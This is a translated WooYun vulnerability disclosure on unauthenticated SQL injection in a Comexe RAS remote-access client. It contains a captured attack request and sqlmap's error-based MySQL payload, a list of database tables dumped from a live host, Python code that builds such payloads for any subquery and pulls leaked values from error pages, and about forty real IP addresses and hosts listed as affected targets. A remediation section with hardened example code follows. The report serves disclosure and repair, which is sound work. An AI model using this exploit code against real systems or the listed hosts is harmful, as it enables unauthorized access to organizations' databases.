
Vulnerability summary

Defect ID: wooyun-2015-0117921

Title: Two SQL injections in a Comexe (科迈) client affect a large number of systems (no login required, DBA privileges)

Vendor: 深圳市科迈通讯技术有限公司 (Shenzhen Comexe Communication Technology Co., Ltd.)

Author: YY-2012

Submitted: 2015-06-03 11:57

Fixed: 2015-09-06 09:08

Published: 2015-09-06 09:08

Type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-06-03: Details sent to the vendor; awaiting vendor handling
2015-06-08: Vendor confirmed; details visible to the vendor only
2015-06-11: Details opened to third-party security partners
2015-08-02: Details opened to core white hats and domain experts
2015-08-12: Details opened to regular white hats
2015-08-22: Details opened to intern white hats
2015-09-06: Details made public

Brief description:

More than 30 affected instances are listed below.

Details:

Comexe RAS Standard Edition client (远程快速应用接入, "rapid remote application access").
SQL injection reachable without logging in. The captured request:

POST /server/cmxpagedquery.php?pgid=AppList&SearchFlag=true HTTP/1.1
Content-Length: 136
Content-Type: application/x-www-form-urlencoded
Referer: http://61.186.152.218:80/
Cookie: PHPSESSID=jb7b826hb3p30jf2rdt17mr8n0; RAS_Client_Style=1; g_LanguageID=cn; RAS_Admin_UserInfo_Domain=aa-ecf4369da2f8; temp_DisplayName=tmtgrnvr; temp_Description=%E5%85%81%E8%AE%B8%E7%94%A8%E6%88%B7%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE%E6%AD%A4%E8%AE%A1%E7%AE%97%E6%9C%BA%E4%B8%8A%E7%9A%84%E6%96%87%E4%BB%B6%E5%A4%B9; ErrorInfo=%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E4%BF%A1%E6%81%AF%3A+Parameter+3%3A+%E7%B1%BB%E5%9E%8B%E4%B8%8D%E5%8C%B9%E9%85%8D%E3%80%82%0D%0A+++%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E6%96%87%E4%BB%B6%3A+C%3A%5CProgram+Files%5CComexe%5CRasMini%5Crasweb%5CApache2%5Chtdocs%5Csmarty-2.6.19%5CServer%5CCmxUserGroup.php+%3Cbr+%2F%3E%E9%94%99%E8%AF%AF%E6%89%80%E5%9C%A8%E8%A1%8C%E5%8F%B7%3A+386+%E8%A1%8C%3Cbr+%2F%3E
Host: 61.186.152.218
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
AppID%5b-1%5d=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1*&ViewAppValue=1


The two injectable parameters are ViewAppFld and ViewAppValue. In the capture, the `*` after `ViewAppFld=1` is sqlmap's custom injection mark rather than part of the original traffic, which is why sqlmap's output below reports `Parameter: #1* ((custom) POST)`. Note also that the ErrorInfo cookie in the same capture carries a URL-encoded PHP error ("Parameter 3: type mismatch" in C:\Program Files\Comexe\RasMini\rasweb\Apache2\htdocs\smarty-2.6.19\Server\CmxUserGroup.php, line 386): the application reflects backend error text to the client, which already discloses the install path and the Smarty version, and the error-based technique sqlmap settled on confirms that database error messages are reflected the same way.


Proof of vulnerability:

[three screenshots in the original; sqlmap output follows]


---
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: AppID[-1]=651&clear=%e6%b8%85%e7%a9%ba&NMFind=%e6%90%9c%e7%b4%a2&pageNo=&sort=DisplayName&sortType=A&ViewAppFld=1) AND (SELECT 4511 FROM(SELECT COUNT(*),CONCAT(0x716b7a7671,(SELECT (ELT(4511=4511,1))),0x71716a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1461=1461&ViewAppValue=1
---
web server operating system: Windows
web application technology: PHP 5.2.6, Apache 2.2.9
back-end DBMS: MySQL 5.0
Database: rasdatabase
[71 tables]
+---------------------------+
| hbadminrolegroupmembers |
| hbadminrolerestrictedorgs |
| hbadminroletask |
| hbadminroleusermembers |
| hbclientgroupapplication |
| hbclientgroupprinter |
| hbdirectoryapplication |
| hborgapplication |
| hborglicensepolicy |
| hborgpolicy |
| hbpolicyvalues |
| hbroletask |
| hbserverapplication |
| hbserverprinterdriver |
| hbserverprintinf |
| hbserverrole |
| hbservertask |
| hbtaskaction |
| hbtaskcondition |
| hbuserapplication |
| hbuserdirectory |
| hbuserorgs |
| hbuserpolicy |
| lograsarchi |
| lograsconcurrenta |
| lograsconcurrentus |
| lograsent |
| lograssessi |
| lograstaskactionhist |
| lograstaskhist |
| rasactions |
| rasadminroles |
| rasadmintasks |
| rasapplication |
| rasbadprinterdriver |
| rascfg |
| rasclient |
| rasclientgroup |
| rascompatibilitydriver |
| rasconcurrentsession |
| rasconditions |
| rasconnectionsetting |
| rasdatabase |
| rasdirectory |
| rasdmzserverd |
| rasdomain |
| rasgroupuser |
| rasinfocollectordata |
| rasjobs |
| rasjobsteps |
| raslicenseinfo |
| raslicensetoken |
| raslicpolicy |
| raslockdownpolicies |
| rasmonthlyminute |
| rasorgs |
| rasprinter |
| rasprinterdriver |
| rasproductk |
| rasreqids |
| rasroles |
| rasrunningservers |
| rasselection |
| rasserver |
| rasstyle |
| rastasks |
| rasticketing |
| rastimedsessio |
| rasuser |
| rasusermng |
| usermachines |
+---------------------------+
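To make the sqlmap output above concrete, here is an added example written for this page (not sqlmap's code and not part of the original report) that reconstructs the error-based payload for an arbitrary subquery, builds the POST body with that payload in place of the `1*` injection mark, and parses the result back out of a reflected MySQL duplicate-entry error. The marker strings are the ones sqlmap embedded in the payload above; the response text is constructed for the demo and was not captured from any host.

```python
import re
from typing import Dict, Optional
from urllib.parse import parse_qs, urlencode

# Marker strings sqlmap embedded in the payload above, written there as hex
# literals (0x716b7a7671 and 0x71716a7671) so they need no quotes in the SQL.
PREFIX = bytes.fromhex("716b7a7671").decode()   # 'qkzvq'
SUFFIX = bytes.fromhex("71716a7671").decode()   # 'qqjvq'

# Fixed form fields from the captured request; ViewAppFld/ViewAppValue are
# filled in per payload.
BASE_FIELDS = {
    "AppID[-1]": "651",
    "clear": "清空",
    "NMFind": "搜索",
    "pageNo": "",
    "sort": "DisplayName",
    "sortType": "A",
}


def build_error_based_payload(subquery: str, prefix: str = PREFIX, suffix: str = SUFFIX) -> str:
    """Build a ViewAppFld value in the exact shape sqlmap used.

    The leading '1)' closes the parenthesis the application wraps around the
    field expression, and the trailing 'AND (1461=1461' leaves one open for the
    application's own ')' to complete. The inner SELECT triggers MySQL's
    duplicate-key error: GROUP BY on CONCAT(..., FLOOR(RAND(0)*2)) evaluates
    the key once when looking it up and again when inserting it, and the seeded
    RAND(0) floor sequence (0,1,1,0,...) makes the third row insert a key that
    already exists. The error message then carries prefix+result+suffix back
    to the client. INFORMATION_SCHEMA.CHARACTER_SETS only supplies enough rows.
    """
    hp = "0x" + prefix.encode().hex()
    hs = "0x" + suffix.encode().hex()
    return (
        "1) AND (SELECT 4511 FROM(SELECT COUNT(*),"
        f"CONCAT({hp},({subquery}),{hs},FLOOR(RAND(0)*2))x "
        "FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1461=1461"
    )


def build_post_body(view_app_fld: str, view_app_value: str = "1") -> str:
    """application/x-www-form-urlencoded body for cmxpagedquery.php with the
    payload substituted for the '1*' injection mark in the capture."""
    fields = dict(BASE_FIELDS, ViewAppFld=view_app_fld, ViewAppValue=view_app_value)
    return urlencode(fields)


def decode_post_body(body: str) -> Dict[str, str]:
    """Inverse of build_post_body, to check the payload survives encoding."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


DUP_ENTRY_RE = re.compile(r"Duplicate entry '(.*?)' for key")


def extract_leaked_value(response_text: str, prefix: str = PREFIX, suffix: str = SUFFIX) -> Optional[str]:
    """Pull the subquery result out of a reflected MySQL duplicate-entry error.

    Returns None when the page carries no such error (errors suppressed, or the
    payload did not reach the database)."""
    m = DUP_ENTRY_RE.search(response_text)
    if not m:
        return None
    entry = m.group(1)
    start = entry.find(prefix)
    if start < 0:
        return None
    end = entry.find(suffix, start + len(prefix))
    if end < 0:
        return None
    return entry[start + len(prefix):end]


# Constructed sample response (not a real capture): the shape a MySQL 5.x
# error takes when the application prints the query error verbatim, in the
# same "<br />错误信息:" wrapper the ErrorInfo cookie shows.
SAMPLE_RESPONSE = (
    "<br />错误信息: Duplicate entry 'qkzvq5.0.45-community-ntqqjvq1' "
    "for key 'group_key'<br />"
)

if __name__ == "__main__":
    payload = build_error_based_payload("SELECT VERSION()")
    print(build_post_body(payload))
    print(extract_leaked_value(SAMPLE_RESPONSE))  # 5.0.45-community-nt
```

With the subquery `SELECT (ELT(4511=4511,1))` the builder reproduces the confirmation payload in the sqlmap output character for character; swapping in `SELECT VERSION()`, `SELECT USER()` or a `SELECT ... LIMIT n,1` over the table list is how the rest of that enumeration is obtained one value per request.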


Affected instances:
http://218.1.41.170:8080/cmxlogin.php?t=14328474426374
http://183.230.42.251:81/CmxDownload.php
http://116.236.205.196/CmxDownload.php
http://221.13.104.174:8888/CmxDownload.php
http://61.186.242.110:8080/CmxDownload.php
http://61.175.246.46:8080/CmxDownload.php
http://113.204.169.94:8888/CmxDownload.php
http://116.236.131.194:8080/CmxDownload.php
http://221.12.100.166:81/CmxDownload.php
http://222.178.221.54:8080/CmxDownload.php
http://61.186.152.218/CmxDownload.php
http://222.177.13.93:8888/CmxDownload.php
http://180.175.223.220:8000/cmxlogin.php?t=14328287201481
http://60.190.177.172:8888/CmxDownload.php
http://221.239.106.90:81/CmxDownload.php
http://122.226.31.30:8080/CmxDownload.php
http://58.222.218.171:8888/CmxDownload.php
http://erp.ap365.com:8088/CmxDownload.php
http://61.161.199.197/CmxDownload.php
http://125.66.20.6/CmxDownload.php
http://180.168.5.162:8080/CmxDownload.php
http://111.30.26.38:8000/CmxDownload.php
http://122.227.188.254/cmxlogin.php?t=14328022273495
http://124.67.67.99:8080/CmxDownload.php
http://61.187.64.183/CmxDownload.php
http://222.34.131.4:81/CmxDownload.php
http://58.42.232.99:81/CmxDownload.php
http://222.163.239.16:8080/CmxDownload.php
http://115.231.212.82:8080/CmxDownload.php
http://114.135.72.241:81/CmxDownload.php
http://58.211.90.4:81/CmxDownload.php
http://218.26.176.140:8080/cmxlogin.php?t=14327793397546
http://61.164.136.94:81/CmxDownload.php
http://202.104.138.38/CmxDownload.php
http://115.236.48.147:81/CmxDownload.php
http://58.246.235.50/CmxDownload.php
http://218.31.33.158:8001/CmxDownload.php
http://221.131.95.136:81/CmxDownload.php
http://60.10.34.57:8888/CmxDownload.php
http://58.18.169.92/CmxDownload.php

Remediation:

Filter the input. Concretely: ViewAppFld appears to be spliced into the query as an unquoted expression (the working payload begins with `1)` and contains no quote character), so it should be checked against a fixed allow-list of permitted column names; ViewAppValue should be passed as a bound parameter rather than concatenated into the SQL string.
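As an added illustration of that fix (example code written for this page, not Comexe's own; the query shape, the column names and the use of SQLite in place of MySQL are assumptions made so the demo runs offline), here is a reconstruction of the vulnerable pattern beside a hardened version: the column name is accepted only from an allow-list, the search value is bound, and LIKE wildcards in it are escaped so user input cannot widen the match.

```python
import sqlite3
from typing import List

# Columns a client may search on; anything else is rejected before it reaches
# the SQL string. Assumed names: DisplayName appears in the capture's sort
# parameter, Description only in a cookie, so the real schema may differ.
ALLOWED_FIELDS = frozenset({"DisplayName", "Description"})


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the rasapplication table, with constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE rasapplication (AppID INTEGER, DisplayName TEXT, Description TEXT)"
    )
    con.executemany(
        "INSERT INTO rasapplication VALUES (?, ?, ?)",
        [
            (651, "Word", "Office word processor"),
            (652, "Excel", "Office spreadsheet"),
            (653, "Notepad", "100% plain text editor"),
        ],
    )
    return con


def search_vulnerable(con: sqlite3.Connection, view_app_fld: str, view_app_value: str) -> List[str]:
    """Reconstruction (assumed shape) of the vulnerable pattern: both parameters
    are spliced into the SQL text. The field name goes in unquoted, which is
    why a payload beginning with '1)' can close the parenthesis and append its
    own clauses; the value sits inside a quoted LIKE pattern."""
    sql = (
        "SELECT DisplayName FROM rasapplication "
        f"WHERE ({view_app_fld} LIKE '%{view_app_value}%') ORDER BY DisplayName"
    )
    return [row[0] for row in con.execute(sql)]


def escape_like(value: str) -> str:
    """Make '%', '_' and the escape character literal inside a LIKE pattern."""
    return value.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def search_hardened(con: sqlite3.Connection, view_app_fld: str, view_app_value: str) -> List[str]:
    """Allow-list the identifier, bind the value, escape LIKE metacharacters."""
    if view_app_fld not in ALLOWED_FIELDS:
        raise ValueError(f"unexpected search field: {view_app_fld!r}")
    # Splicing the identifier is safe only because it came from ALLOWED_FIELDS.
    # The value is a bound parameter; ESCAPE '\' pairs with escape_like().
    sql = (
        "SELECT DisplayName FROM rasapplication "
        "WHERE (" + view_app_fld + " LIKE ? ESCAPE '\\') ORDER BY DisplayName"
    )
    pattern = "%" + escape_like(view_app_value) + "%"
    return [row[0] for row in con.execute(sql, (pattern,))]


if __name__ == "__main__":
    con = make_db()
    print(search_vulnerable(con, "1) OR (1=1", "zzz"))      # every row leaks
    print(search_hardened(con, "DisplayName", "Word"))     # ['Word']
    try:
        search_hardened(con, "1) OR (1=1", "zzz")
    except ValueError as e:
        print("rejected:", e)
```

In the application's own PHP the same shape is an in_array() check of $_POST['ViewAppFld'] against the fixed list plus a PDO or mysqli prepared statement for ViewAppValue; the point is that an identifier can never be bound, so it must be validated, while a value must never be spliced, so it must be bound.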

Copyright notice: when reposting, credit the source: YY-2012@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 14

Confirmed: 2015-06-08 09:07

Vendor reply:

CNVD has confirmed the described situation and has notified the software vendor through the public contact information on its website.

Latest status:

None yet